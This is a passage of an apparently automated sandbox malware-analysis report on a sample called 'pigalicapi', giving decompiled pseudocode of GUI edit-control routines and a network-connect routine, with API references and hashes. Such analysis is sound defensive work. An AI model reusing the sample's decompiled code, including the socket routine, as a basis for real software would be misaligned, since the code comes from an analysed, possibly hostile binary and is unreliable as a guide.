                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t64 = __ebx;
                                                                                                                                                                                                                                                                                          				_t27 = SendMessageA( *(__ebx + 0x254), 0xb8, 0, 0);
                                                                                                                                                                                                                                                                                          				if(_t27 !=  *(__ebx + 0x4b4)) {
                                                                                                                                                                                                                                                                                          					 *(__ebx + 0x4b4) = _t27;
                                                                                                                                                                                                                                                                                          					E00808160(__ebx);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t83 = _t64 + 0x3c;
                                                                                                                                                                                                                                                                                          				E008053A0(0xe12b, _t83, SendMessageA( *(_t64 + 0x254), 0xc6, 0, 0));
                                                                                                                                                                                                                                                                                          				E008053A0(0xe125, _t83, SendMessageA( *(_t64 + 0x254), 0x432, 1, 0));
                                                                                                                                                                                                                                                                                          				_t79 = 0 | SendMessageA( *(_t64 + 0x254), 0x442, 0, 0) != 0x00000000;
                                                                                                                                                                                                                                                                                          				E008053A0(0xe123, _t83, SendMessageA( *(_t64 + 0x254), 0x442, 0, 0) != 0);
                                                                                                                                                                                                                                                                                          				E008053A0(0xe122, _t83, SendMessageA( *(_t64 + 0x254), 0x442, 0, 0) != 0);
                                                                                                                                                                                                                                                                                          				E008053A0(0xe120, _t83, _t79);
                                                                                                                                                                                                                                                                                          				_t80 = 0 | GetWindowTextLengthA( *(_t64 + 0x254)) > 0x00000000;
                                                                                                                                                                                                                                                                                          				E008053A0(0xe12a, _t83, GetWindowTextLengthA( *(_t64 + 0x254)) > 0);
                                                                                                                                                                                                                                                                                          				E008053A0(0xe124, _t83, GetWindowTextLengthA( *(_t64 + 0x254)) > 0);
                                                                                                                                                                                                                                                                                          				E008053A0(0xe128, _t83, _t80);
                                                                                                                                                                                                                                                                                          				E008053A0(0xe129, _t83, _t80);
                                                                                                                                                                                                                                                                                          				_t81 = _t83;
                                                                                                                                                                                                                                                                                          				E00805440(0x9c43, _t83,  *((intOrPtr*)(_t64 + 0x4b0)));
                                                                                                                                                                                                                                                                                          				if(IsWindow( *(_t64 + 0x4c8)) != 0 && (GetWindowLongA( *(_t64 + 0x4c8), 0xfffffff0) & 0x10000000) != 0) {
                                                                                                                                                                                                                                                                                          					E008053A0(0x9c46, _t83, 0 |  *((intOrPtr*)(_t64 + 0x504)) -  *((intOrPtr*)(_t64 + 0x508)) > 0x00000000);
                                                                                                                                                                                                                                                                                          					E008053A0(0x9c4b, _t83, 0 |  *((intOrPtr*)(_t64 + 0x504)) -  *((intOrPtr*)(_t64 + 0x50c)) < 0x00000000);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_push(_t83);
                                                                                                                                                                                                                                                                                          				return E00805580(_t81);
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x00808ab0
                                                                                                                                                                                                                                                                                          0x00808ac2
                                                                                                                                                                                                                                                                                          0x00808ace
                                                                                                                                                                                                                                                                                          0x00808ad2
                                                                                                                                                                                                                                                                                          0x00808ad8
                                                                                                                                                                                                                                                                                          0x00808ad8
                                                                                                                                                                                                                                                                                          0x00808af3
                                                                                                                                                                                                                                                                                          0x00808afe
                                                                                                                                                                                                                                                                                          0x00808b1b
                                                                                                                                                                                                                                                                                          0x00808b3f
                                                                                                                                                                                                                                                                                          0x00808b42
                                                                                                                                                                                                                                                                                          0x00808b4d
                                                                                                                                                                                                                                                                                          0x00808b58
                                                                                                                                                                                                                                                                                          0x00808b76
                                                                                                                                                                                                                                                                                          0x00808b79
                                                                                                                                                                                                                                                                                          0x00808b84
                                                                                                                                                                                                                                                                                          0x00808b8f
                                                                                                                                                                                                                                                                                          0x00808b9a
                                                                                                                                                                                                                                                                                          0x00808bab
                                                                                                                                                                                                                                                                                          0x00808bad
                                                                                                                                                                                                                                                                                          0x00808bc1
                                                                                                                                                                                                                                                                                          0x00808bf0
                                                                                                                                                                                                                                                                                          0x00808c0c
                                                                                                                                                                                                                                                                                          0x00808c0c
                                                                                                                                                                                                                                                                                          0x00808c11
                                                                                                                                                                                                                                                                                          0x00808c19

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00808AC2
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00808AF6
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00808B13
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00808B30
                                                                                                                                                                                                                                                                                          • GetWindowTextLengthA.USER32(?), ref: 00808B64
                                                                                                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 00808BB9
                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 00808BCC
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrlenA.KERNEL32(?,?,?), ref: 00808182
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: LoadStringA.USER32 ref: 008081A2
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrlenA.KERNEL32(?,?,?), ref: 008081AF
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrcpyA.KERNEL32(?,?,?,?), ref: 008081C4
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrcatA.KERNEL32(?,00822A2C), ref: 008081DF
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrcatA.KERNEL32(?, - ), ref: 008081E7
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: lstrcatA.KERNEL32(?,?,?, - ), ref: 008081F1
                                                                                                                                                                                                                                                                                            • Part of subcall function 00808160: SetWindowTextA.USER32(?), ref: 008081F8
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSendWindow$lstrcat$Textlstrlen$LengthLoadLongStringlstrcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2003012902-0
                                                                                                                                                                                                                                                                                          • Opcode ID: faf5da79bd24e407e65f13d3722464441d0495206d7e4f63a32ca896149f7908
                                                                                                                                                                                                                                                                                          • Instruction ID: d8149e7967eb11c3f93da869f83969a16a1be9b4b40b4032ba7c71b3c55dcdd5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: faf5da79bd24e407e65f13d3722464441d0495206d7e4f63a32ca896149f7908
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C83160717005006BF754AB69CC8AF9B2269EFC5740F95443CBA05EF2D6CAB8A8418E75
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                          			E0400A090(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                                                                          				signed char _v8;
                                                                                                                                                                                                                                                                                          				short _v12;
                                                                                                                                                                                                                                                                                          				signed char _v13;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                                          				short _v34;
                                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                                                                                          				char* _t42;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(6);
                                                                                                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                                                                                                          				_push(2);
                                                                                                                                                                                                                                                                                          				L0400B210();
                                                                                                                                                                                                                                                                                          				_v20 = __eax;
                                                                                                                                                                                                                                                                                          				if(_v20 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          					_v36 = 2;
                                                                                                                                                                                                                                                                                          					_push(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                                          					L0400B20A();
                                                                                                                                                                                                                                                                                          					_v34 = 2;
                                                                                                                                                                                                                                                                                          					_push(_a4);
                                                                                                                                                                                                                                                                                          					L0400B204();
                                                                                                                                                                                                                                                                                          					_v12 = 2;
                                                                                                                                                                                                                                                                                          					if(_v12 == 0) {
                                                                                                                                                                                                                                                                                          						return 0xffffffffffffffff;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
                                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                                          					_v13 = 0;
                                                                                                                                                                                                                                                                                          					_v40 = 0;
                                                                                                                                                                                                                                                                                          					while(_v40 < _a12) {
                                                                                                                                                                                                                                                                                          						_push(0x10);
                                                                                                                                                                                                                                                                                          						_t42 =  &_v36;
                                                                                                                                                                                                                                                                                          						_push(_t42);
                                                                                                                                                                                                                                                                                          						_push(_v20);
                                                                                                                                                                                                                                                                                          						L0400B1FE();
                                                                                                                                                                                                                                                                                          						if(_t42 != 0) {
                                                                                                                                                                                                                                                                                          							_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v13 = 1;
                                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          						if(_a16 != 0) {
                                                                                                                                                                                                                                                                                          							_v44 = _a16;
                                                                                                                                                                                                                                                                                          							_push(4);
                                                                                                                                                                                                                                                                                          							_push( &_v44);
                                                                                                                                                                                                                                                                                          							_push(0x1005);
                                                                                                                                                                                                                                                                                          							_push(0xffff);
                                                                                                                                                                                                                                                                                          							_push(_v20);
                                                                                                                                                                                                                                                                                          							L0400B1F2();
                                                                                                                                                                                                                                                                                          							_push(4);
                                                                                                                                                                                                                                                                                          							_push( &_v44);
                                                                                                                                                                                                                                                                                          							_push(0x1006);
                                                                                                                                                                                                                                                                                          							_push(0xffff);
                                                                                                                                                                                                                                                                                          							_push(_v20);
                                                                                                                                                                                                                                                                                          							L0400B1F2();
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						return _v20;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t40 = _v20;
                                                                                                                                                                                                                                                                                          					_push(_t40);
                                                                                                                                                                                                                                                                                          					L0400B1F8();
                                                                                                                                                                                                                                                                                          					return _t40 | 0xffffffff;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v20;
                                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                                          0x0400a096
                                                                                                                                                                                                                                                                                          0x0400a098
                                                                                                                                                                                                                                                                                          0x0400a09a
                                                                                                                                                                                                                                                                                          0x0400a09c
                                                                                                                                                                                                                                                                                          0x0400a0a1
                                                                                                                                                                                                                                                                                          0x0400a0a8
                                                                                                                                                                                                                                                                                          0x0400a0b7
                                                                                                                                                                                                                                                                                          0x0400a0bf
                                                                                                                                                                                                                                                                                          0x0400a0c0
                                                                                                                                                                                                                                                                                          0x0400a0c5
                                                                                                                                                                                                                                                                                          0x0400a0cc
                                                                                                                                                                                                                                                                                          0x0400a0cd
                                                                                                                                                                                                                                                                                          0x0400a0d2
                                                                                                                                                                                                                                                                                          0x0400a0d9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400a0ea
                                                                                                                                                                                                                                                                                          0x0400a0e5
                                                                                                                                                                                                                                                                                          0x0400a0f2
                                                                                                                                                                                                                                                                                          0x0400a0f9
                                                                                                                                                                                                                                                                                          0x0400a0fd
                                                                                                                                                                                                                                                                                          0x0400a10f
                                                                                                                                                                                                                                                                                          0x0400a117
                                                                                                                                                                                                                                                                                          0x0400a119
                                                                                                                                                                                                                                                                                          0x0400a11c
                                                                                                                                                                                                                                                                                          0x0400a120
                                                                                                                                                                                                                                                                                          0x0400a121
                                                                                                                                                                                                                                                                                          0x0400a128
                                                                                                                                                                                                                                                                                          0x0400a10c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400a10c
                                                                                                                                                                                                                                                                                          0x0400a12a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400a12a
                                                                                                                                                                                                                                                                                          0x0400a138
                                                                                                                                                                                                                                                                                          0x0400a14c
                                                                                                                                                                                                                                                                                          0x0400a151
                                                                                                                                                                                                                                                                                          0x0400a154
                                                                                                                                                                                                                                                                                          0x0400a159
                                                                                                                                                                                                                                                                                          0x0400a15a
                                                                                                                                                                                                                                                                                          0x0400a15f
                                                                                                                                                                                                                                                                                          0x0400a167
                                                                                                                                                                                                                                                                                          0x0400a168
                                                                                                                                                                                                                                                                                          0x0400a16d
                                                                                                                                                                                                                                                                                          0x0400a172
                                                                                                                                                                                                                                                                                          0x0400a173
                                                                                                                                                                                                                                                                                          0x0400a178
                                                                                                                                                                                                                                                                                          0x0400a180
                                                                                                                                                                                                                                                                                          0x0400a181
                                                                                                                                                                                                                                                                                          0x0400a181
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400a186
                                                                                                                                                                                                                                                                                          0x0400a13a
                                                                                                                                                                                                                                                                                          0x0400a13d
                                                                                                                                                                                                                                                                                          0x0400a13e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400a143
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 0400A09C
                                                                                                                                                                                                                                                                                          • htons.WS2_32(?), ref: 0400A0C0
                                                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 0400A0CD
                                                                                                                                                                                                                                                                                          • connect.WS2_32(000000FF,?,00000010), ref: 0400A121
                                                                                                                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 0400A13E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 530611402-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                                          • Instruction ID: a070b3506782e3d460d1e62e3f028d70face053f71bdd0f6ca274d7f1f380b7b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65312B70B00319ABEB10EFE4D845BFEB7B5AF98314F108659E5217B2C0E7B5A940CB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                          			E00808070(void* __esi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				void* _v108;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t16;
                                                                                                                                                                                                                                                                                          				int _t21;
                                                                                                                                                                                                                                                                                          				int _t23;
                                                                                                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                                                                                                                                          				intOrPtr _t36;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t43;
                                                                                                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t46 = __esi;
                                                                                                                                                                                                                                                                                          				_t16 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t16 ^ _t47;
                                                                                                                                                                                                                                                                                          				_t45 = wsprintfA;
                                                                                                                                                                                                                                                                                          				wsprintfA( &_v108, "Row: %i",  *((intOrPtr*)(__esi + 0x2a0)) + 1);
                                                                                                                                                                                                                                                                                          				_t33 =  *((intOrPtr*)(__esi + 0x248));
                                                                                                                                                                                                                                                                                          				_t31 = SendMessageA;
                                                                                                                                                                                                                                                                                          				_t21 = 0;
                                                                                                                                                                                                                                                                                          				if(_t33 > 0) {
                                                                                                                                                                                                                                                                                          					_t43 =  *((intOrPtr*)(__esi + 0x24c));
                                                                                                                                                                                                                                                                                          					while( *_t43 != 0xefdb) {
                                                                                                                                                                                                                                                                                          						_t21 = _t21 + 1;
                                                                                                                                                                                                                                                                                          						_t43 = _t43 + 4;
                                                                                                                                                                                                                                                                                          						if(_t21 < _t33) {
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_t21 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t46 + 0x228), 0x401, _t21,  &_v108);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L7:
                                                                                                                                                                                                                                                                                          				_t42 =  &_v108;
                                                                                                                                                                                                                                                                                          				wsprintfA( &_v108, "Col: %i",  *((intOrPtr*)(_t46 + 0x2a4)) + 1);
                                                                                                                                                                                                                                                                                          				_t36 =  *((intOrPtr*)(_t46 + 0x248));
                                                                                                                                                                                                                                                                                          				_t23 = 0;
                                                                                                                                                                                                                                                                                          				if(_t36 <= 0) {
                                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                                          					return E008159E6(0, _t31, _v8 ^ _t47, _t42, _t45, _t46);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t42 =  *(_t46 + 0x24c);
                                                                                                                                                                                                                                                                                          					while(_t42->i != 0xefdc) {
                                                                                                                                                                                                                                                                                          						_t23 = _t23 + 1;
                                                                                                                                                                                                                                                                                          						_t42 = _t42 + 4;
                                                                                                                                                                                                                                                                                          						if(_t23 < _t36) {
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							return E008159E6(0, _t31, _v8 ^ _t47, _t42, _t45, _t46);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_t23 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          						_t42 =  *(_t46 + 0x228);
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t46 + 0x228), 0x401, _t23,  &_v108);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L15:
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x00808070
                                                                                                                                                                                                                                                                                          0x00808076
                                                                                                                                                                                                                                                                                          0x0080807d
                                                                                                                                                                                                                                                                                          0x00808088
                                                                                                                                                                                                                                                                                          0x00808099
                                                                                                                                                                                                                                                                                          0x0080809b
                                                                                                                                                                                                                                                                                          0x008080a1
                                                                                                                                                                                                                                                                                          0x008080aa
                                                                                                                                                                                                                                                                                          0x008080ae
                                                                                                                                                                                                                                                                                          0x008080b0
                                                                                                                                                                                                                                                                                          0x008080b6
                                                                                                                                                                                                                                                                                          0x008080be
                                                                                                                                                                                                                                                                                          0x008080bf
                                                                                                                                                                                                                                                                                          0x008080c4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008080c6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008080c4
                                                                                                                                                                                                                                                                                          0x008080cb
                                                                                                                                                                                                                                                                                          0x008080de
                                                                                                                                                                                                                                                                                          0x008080de
                                                                                                                                                                                                                                                                                          0x008080cb
                                                                                                                                                                                                                                                                                          0x008080e0
                                                                                                                                                                                                                                                                                          0x008080e8
                                                                                                                                                                                                                                                                                          0x008080f1
                                                                                                                                                                                                                                                                                          0x008080f3
                                                                                                                                                                                                                                                                                          0x008080fc
                                                                                                                                                                                                                                                                                          0x00808100
                                                                                                                                                                                                                                                                                          0x00808142
                                                                                                                                                                                                                                                                                          0x00808153
                                                                                                                                                                                                                                                                                          0x00808102
                                                                                                                                                                                                                                                                                          0x00808102
                                                                                                                                                                                                                                                                                          0x00808108
                                                                                                                                                                                                                                                                                          0x00808110
                                                                                                                                                                                                                                                                                          0x00808111
                                                                                                                                                                                                                                                                                          0x00808116
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00808119
                                                                                                                                                                                                                                                                                          0x00808129
                                                                                                                                                                                                                                                                                          0x00808129
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00808116
                                                                                                                                                                                                                                                                                          0x0080812d
                                                                                                                                                                                                                                                                                          0x0080812f
                                                                                                                                                                                                                                                                                          0x00808140
                                                                                                                                                                                                                                                                                          0x00808140
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080812d
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSendwsprintf
                                                                                                                                                                                                                                                                                          • String ID: Col: %i$Row: %i
                                                                                                                                                                                                                                                                                          • API String ID: 3751067900-1661183516
                                                                                                                                                                                                                                                                                          • Opcode ID: ff4abd85b0cb23097a09d5416ecbac84fa389f9633ea534051fc86124ab2b269
                                                                                                                                                                                                                                                                                          • Instruction ID: 515f0e92bcde264afb8133547ce11cff9783583a208264b17e4dc431d7e62205
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff4abd85b0cb23097a09d5416ecbac84fa389f9633ea534051fc86124ab2b269
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C421A131211605DFD768DB68DC85DABB3A9FF84320F104A2DE49AD72D0DE70E886CB41
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                          			E0080D220(void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v28;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				signed int _t34;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t36;
                                                                                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t60 = __esi;
                                                                                                                                                                                                                                                                                          				_t59 = __edi;
                                                                                                                                                                                                                                                                                          				_t34 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v12 = _t34 ^ _t61;
                                                                                                                                                                                                                                                                                          				_t36 =  *(__esi + 0x24);
                                                                                                                                                                                                                                                                                          				_t49 = GetWindowLongA;
                                                                                                                                                                                                                                                                                          				if(_t36 != 0 && (GetWindowLongA(_t36, 0xfffffff0) & 0x10000000) != 0) {
                                                                                                                                                                                                                                                                                          					if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          						SendMessageA( *(__esi + 0x24), 5, 0, 0);
                                                                                                                                                                                                                                                                                          						InvalidateRect( *(__esi + 0x24), 0, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t56 =  &_v28;
                                                                                                                                                                                                                                                                                          					_v28.left = 0;
                                                                                                                                                                                                                                                                                          					_v28.top = 0;
                                                                                                                                                                                                                                                                                          					_v28.right = 0;
                                                                                                                                                                                                                                                                                          					_v28.bottom = 0;
                                                                                                                                                                                                                                                                                          					GetWindowRect( *(_t60 + 0x24),  &_v28);
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t59 + 4)) =  *((intOrPtr*)(_t59 + 4)) + _v28.bottom - _v28.top;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t37 =  *(_t60 + 0x28);
                                                                                                                                                                                                                                                                                          				if(_t37 != 0 && (_t37 & 0x10000000) != 0) {
                                                                                                                                                                                                                                                                                          					if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t60 + 0x28), 5, 0, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v28.top = 0;
                                                                                                                                                                                                                                                                                          					_v28.right = 0;
                                                                                                                                                                                                                                                                                          					_v28.bottom = 0;
                                                                                                                                                                                                                                                                                          					_v28.left = 0;
                                                                                                                                                                                                                                                                                          					_t37 = GetWindowRect( *(_t60 + 0x28),  &_v28);
                                                                                                                                                                                                                                                                                          					_t56 = _v28.top - _v28.bottom;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t59 + 0xc)) =  *((intOrPtr*)(_t59 + 0xc)) + _v28.top - _v28.bottom;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E008159E6(_t37, _t49, _v12 ^ _t61, _t56, _t59, _t60);
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x0080d220
                                                                                                                                                                                                                                                                                          0x0080d220
                                                                                                                                                                                                                                                                                          0x0080d226
                                                                                                                                                                                                                                                                                          0x0080d22d
                                                                                                                                                                                                                                                                                          0x0080d230
                                                                                                                                                                                                                                                                                          0x0080d234
